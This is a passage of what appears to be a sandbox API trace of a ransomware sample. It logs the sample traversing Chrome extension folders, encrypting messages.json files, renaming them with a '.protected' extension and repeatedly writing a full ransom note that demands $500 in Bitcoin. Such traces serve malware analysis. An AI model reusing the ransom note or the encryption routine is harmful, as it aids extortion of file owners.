Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\RESTORE_FILES.txt") returned 163 [0081.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.254] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.254] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.255] lstrlenA (lpString="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") returned 684 [0081.255] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0081.255] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.255] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.255] CloseHandle (hObject=0x164) returned 1 [0081.255] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0081.255] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned 148 [0081.255] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0081.255] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0081.255] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*") returned 150 [0081.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\.") returned 150 [0081.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\..") returned 151 [0081.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.256] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.256] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.257] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.257] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.257] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x253, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffdad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.259] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x253, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.260] CloseHandle (hObject=0x168) returned 1 [0081.260] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.protected") returned 172 [0081.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0081.261] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.261] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.261] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 166 [0081.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0081.262] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.262] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.263] lstrlenA (lpString="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") returned 684 [0081.263] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.263] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.263] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.263] CloseHandle (hObject=0x164) returned 1 [0081.263] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0081.263] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0081.263] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned 148 [0081.263] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0081.263] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*") returned 150 [0081.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.264] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.264] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\.") returned 150 [0081.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.264] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.264] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.264] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\..") returned 151 [0081.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.264] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.264] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.264] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.265] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.265] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.265] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.265] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.265] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.266] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json") returned 162 [0081.266] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.266] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x280, lpOverlapped=0x0) returned 1 [0081.267] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.267] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x280, lpOverlapped=0x0) returned 1 [0081.268] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.268] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.268] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.268] CloseHandle (hObject=0x168) returned 1 [0081.268] wnsprintfW (in: pszDest=0xd11128, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.protected") returned 172 [0081.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0081.269] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.269] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 166 [0081.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.270] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.270] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.271] lstrlenA (lpString="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") returned 684 [0081.271] WriteFile (in: hFile=0x164, 
